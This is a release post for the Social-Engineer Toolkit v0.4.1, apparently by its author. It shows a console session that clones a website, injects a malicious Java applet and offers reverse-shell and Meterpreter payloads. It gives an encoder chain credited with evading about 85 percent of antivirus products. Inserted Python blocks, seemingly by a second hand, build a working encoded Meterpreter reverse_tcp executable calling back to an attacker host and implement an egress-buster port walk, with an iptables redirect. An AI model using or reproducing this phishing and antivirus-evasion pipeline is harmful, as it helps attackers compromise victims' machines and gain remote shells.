February 24, 2010
SET V0.4.1 Rise of the Pink Pirate
Written by
David Kennedy
Security Testing & Analysis
Social Engineering
Well, since the ShmooCon talk there has been a wide variety of testing and feedback on the latest version. I have to say that I am appreciative of everyone trying to contribute to the project; it's been great. So many thanks to all of you who have contacted me!
OK, so now that the thanks are out of the way, what's different in SET v0.4.1 "Rise of the Pink Pirate"?
One of the biggest complaints about SET v0.4 was anti-virus detection. The default option now lets you chain multiple encoders through msfencode, piggybacking several encoding methods onto one payload. I spent about 8 hours going through every combination of A/V detection and finding which combination worked the best. It's not a 100 percent science, and results change from run to run, since shikata_ga_nai is a polymorphic encoder and emits different bytes every time it is run. The combination I ended up with was:
Shikata encoding 5 times
Alpha_Upper encoding 2 times
Shikata encoding 5 times
Countdown encoding 5 times
This combination gets around roughly 85 percent of the virus vendors out there. It will probably need to be changed continuously as vendors catch up to it. I am also looking at writing a dynamic encoder custom to SET that would create a decoder stub in memory, would be somewhat polymorphic, and would sit on top of the encoders in MSF. Hopefully I'll have this in 0.5, which is expected to release in the April timeframe.
To access this new feature, do the following:
root@bt:/pentest/exploits/set# ./set
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
Select from the menu on what you would like to do:
1. Spear-Phishing (Email) Attacks
2. Website Attack Vectors
3. Update the Metasploit Framework
4. Update the Social-Engineer Toolkit
5. Create a Payload and Listener
6. Help, Credits, and About
7. Exit the Social-Engineer Toolkit
Enter your choice: 2
The Social-Engineer Toolkit "Web Attack" will create a
fake "professional" looking website for you with malicious
java applet code or utilize iframes with Metasploit payloads.
When you entice a victim to the website either through
social-engineering, an XSS vulnerability, ARP cache poisoning,
E-Mail, or other options.
The payload can either be something you specify or
dynamically through the Metasploit framework.
A new addition is the ability to clone a website. SET will
allow you to clone a website you specify and automatically
inject the java applet attack or browser exploit into the
site.
This can be useful if you want to make a website look
similar to a company that you are doing a penetration
testing on and want the site to look and feel like their
own. It's currently experimental. Please email any issues
to [email protected]
Website Attack Vectors
1. Let SET create a website for you
2. Clone and setup a fake website
3. Import your own website
4. Return to main menu.
Enter number (1-4): 2
Enter what type of attack you would like to utilize.
The Java Applet attack will spoof a Java Certificate and
deliver a Metasploit-based payload.
The Metasploit browser exploit method will utilize select
Metasploit browser exploits through an iframe and deliver
a Metasploit payload.
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Return to the previous menu.
Enter your choice (press enter for default): 1
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: http://www.google.com
[*] Cloning the website: http://www.google.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Malicious java applet website prepped for deployment
What payload do you want to generate:
    Name:                                    Description:
1.  Windows Shell Reverse_TCP                Spawn a command shell on victim and send back to attacker.
2.  Windows Reverse_TCP Meterpreter          Spawn a meterpreter shell on victim and send back to attacker.
3.  Windows Reverse_TCP VNC DLL              Spawn a VNC server on victim and send back to attacker.
4.  Windows Bind Shell                       Execute payload and create an accepting port on remote system.
5.  Windows Bind Shell X64                   Windows x64 Command Shell, Bind TCP Inline
6.  Windows Shell Reverse_TCP X64            Windows X64 Command Shell, Reverse TCP Inline
7.  Windows Meterpreter Reverse_TCP X64      Connect back to the attacker (Windows x64), Meterpreter
8.  Windows Meterpreter Egress Buster        Spawn a meterpreter shell and find a port home via multiple ports
9.  Import your own executable               Specify a path for your own executable
Enter choice (hit enter for default):
Below is a list of encodings to try and bypass AV.
Select one of the below, Shikata_Ga_Nai is typically the best.
1. avoid_utf8_tolower (Good)
2. shikata_ga_nai (Excellent)
3. alpha_mixed (Good)
4. alpha_upper (Good)
5. call4_dword_xor (Good)
6. countdown (Good)
7. fnstenv_mov (Good)
8. jmp_call_additive (Good)
9. nonalpha (Good)
10. nonupper (Good)
11. unicode_mixed (Good)
12. unicode_upper (Good)
13. alpha2 (Good)
14. No Encoding (None)
15. Multi-Encoder (BEST)
Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default): 443
[-] Encoding the payload multiple times to get around pesky Anti-Virus. [-]
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)
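The same chain can be reproduced outside SET. Below is an added example (not SET's or Metasploit's own code) that drives the Metasploit 3.x command-line tools of the period, msfpayload and msfencode, as a pipeline: each stage reads the previous stage's raw bytes on stdin and emits raw bytes, and only the final stage wraps the result as a Windows exe. The payload name, LHOST and output filename are assumed lab values; port 443 matches the transcript above. Later Metasploit releases folded both tools into msfvenom, so this reflects the 2010 toolchain.

```python
"""Reproduce SET 0.4.1's multi-encoder chain with msfpayload/msfencode.

Added example, not code from SET or Metasploit. Assumes the Metasploit 3.x
tools msfpayload and msfencode are on PATH; handler address 10.0.0.5 and the
output file name are assumed lab values.
"""
import subprocess
from typing import List, Optional, Sequence, Tuple

# The chain from the post, applied in this order: (encoder, iterations).
SET_CHAIN: Sequence[Tuple[str, int]] = (
    ("x86/shikata_ga_nai", 5),
    ("x86/alpha_upper", 2),
    ("x86/shikata_ga_nai", 5),
    ("x86/countdown", 5),
)


def payload_cmd(payload: str, lhost: str, lport: int) -> List[str]:
    """msfpayload argv that prints the stager as raw bytes ('R' = raw output)."""
    return ["msfpayload", payload, f"LHOST={lhost}", f"LPORT={lport}", "R"]


def encode_cmds(chain: Sequence[Tuple[str, int]], final_format: str = "exe",
                out_file: Optional[str] = None) -> List[List[str]]:
    """One msfencode argv per chain stage.

    Every stage but the last emits raw bytes (-t raw) so the next encoder can
    consume them on stdin; the last stage emits final_format (exe here) and
    optionally writes it to out_file with -o.
    """
    cmds: List[List[str]] = []
    for idx, (encoder, iterations) in enumerate(chain):
        last = idx == len(chain) - 1
        cmd = ["msfencode", "-a", "x86", "-e", encoder, "-c", str(iterations),
               "-t", final_format if last else "raw"]
        if last and out_file:
            cmd += ["-o", out_file]
        cmds.append(cmd)
    return cmds


def run_chain(argvs: Sequence[Sequence[str]]) -> bytes:
    """Run argvs as a pipeline (the shell's '|') and return the last stdout.

    stderr is left attached to the terminal so msfencode's
    '[*] x86/... succeeded with size N (iteration=i)' lines stay visible.
    Raises if any stage exits non-zero, e.g. an encoder that cannot satisfy
    its bad-character constraints.
    """
    procs: List[subprocess.Popen] = []
    upstream = None
    for argv in argvs:
        proc = subprocess.Popen(list(argv), stdin=upstream, stdout=subprocess.PIPE)
        if upstream is not None:
            upstream.close()  # drop the parent's copy so EOF reaches the next stage
        procs.append(proc)
        upstream = proc.stdout
    output = procs[-1].communicate()[0]
    for proc, argv in zip(procs, argvs):
        if proc.wait() != 0:
            raise RuntimeError(f"stage exited {proc.returncode}: {' '.join(argv)}")
    return output


if __name__ == "__main__":
    stages = [payload_cmd("windows/meterpreter/reverse_tcp", "10.0.0.5", 443)]
    stages += encode_cmds(SET_CHAIN, out_file="set_payload.exe")
    run_chain(stages)  # writes set_payload.exe; sizes print per iteration on stderr
```

Because each msfencode stage prepends its own decoder stub, the per-iteration size lines you see on stderr should grow exactly as in the transcript above (shikata_ga_nai by a fixed amount per pass, alpha_upper roughly doubling the input since it spends two printable bytes per input byte). Re-running the chain produces a different binary each time, which is why an A/V result from one run does not carry over to the next.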
This is just a complement to an already awesome attack you can utilize within the Social-Engineer Toolkit, adding the overall power of Metasploit's encoders to it.
On to the next big option: SET can now use the Meterpreter ALL PORTS payload (Metasploit's windows/meterpreter/reverse_tcp_allports stager). If you're not familiar with this payload type, it executes a Meterpreter payload on the affected system and then tries (slowly) every single port to connect out of until it finds a way home to the attacker's machine. This is all built into SET now: it auto-creates the payload, delivers the custom Java applet, and executes the payload on the victim. Because every port is attempted, this defeats most egress filtering; typically you can find some port that is allowed outbound. Keep in mind that the handler side has to accept the connection on whichever port the victim finds open, which normally means redirecting all inbound TCP ports on the attacker's box to the handler's listening port. It is labeled in the Web Attack menu as "Windows Meterpreter Egress Buster".
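To make the mechanism concrete, here is an added example in plain Python (not SET's or Metasploit's code) of both halves of an egress-buster connection: a client that walks a list of ports and keeps the first one that lets a TCP connection out, and an accept-once listener standing in for the handler. The loopback address, the timeout value and the iptables redirect quoted in the comment are assumptions for the demonstration, not details from the post.

```python
"""Egress-buster mechanism, modelled in plain Python.

Added example, not code from SET or Metasploit. Everything runs against
127.0.0.1; the blocked/allowed ports are constructed fixtures.
"""
import socket
import threading
from typing import Iterable, Optional, Tuple


def find_egress_port(host: str, ports: Iterable[int], timeout: float = 0.25) -> Optional[int]:
    """Try a TCP connect to host on each port in order.

    Return the first port that accepts, or None if every attempt is refused
    (RST, immediate) or times out (a filtering firewall usually drops the SYN
    silently, so the timeout bounds the cost of each blocked port; walking
    all 65535 ports with a per-port timeout is why the real payload is slow).
    """
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            try:
                sock.connect((host, port))
            except OSError:  # ECONNREFUSED, ETIMEDOUT, EHOSTUNREACH, ...
                continue
            return port
    return None


def start_listener(host: str = "127.0.0.1") -> int:
    """Start an accept-once listener on an ephemeral port and return the port.

    On a real attacker box the handler listens on a single port and every
    other inbound TCP port is redirected to it, for example (assumed standard
    iptables usage, not from the post):
        iptables -t nat -A PREROUTING -p tcp --dport 1:65535 -j REDIRECT --to-ports 443
    so whichever port the victim discovers to be open lands on the handler.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(1)

    def accept_once() -> None:
        try:
            conn, _ = srv.accept()
            conn.close()
        except OSError:
            pass
        finally:
            srv.close()

    threading.Thread(target=accept_once, daemon=True).start()
    return srv.getsockname()[1]


def reserve_closed_port(host: str = "127.0.0.1") -> int:
    """Constructed fixture: bind and immediately release an ephemeral port so
    the demo has a port that is known to be closed (connect gets an RST)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tmp:
        tmp.bind((host, 0))
        return tmp.getsockname()[1]


def demo() -> Tuple[Optional[int], int]:
    """Put one 'allowed' port behind two 'blocked' ones and walk them in order.

    Returns (port the walker found, port the listener was actually on).
    """
    allowed = start_listener()
    blocked = [reserve_closed_port(), reserve_closed_port()]
    found = find_egress_port("127.0.0.1", blocked + [allowed])
    return found, allowed


if __name__ == "__main__":
    found, allowed = demo()
    print(f"walker found port {found}, listener was on {allowed}")
```

Two things the model makes visible that the description above does not: closed ports fail fast because the kernel answers with an RST, whereas a filtering firewall that drops packets costs a full timeout per port, so the walk is dominated by filtered ports; and from the defender's side the behaviour is a single host emitting outbound SYNs to thousands of sequential destination ports on one address, which is a very detectable pattern in flow logs.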
With this release, SET also adds better obfuscation when deploying the Metasploit payloads: the delivery mechanism uses a unique alpha string each time the payload is served, so a static signature can't be written against the payload delivery itself.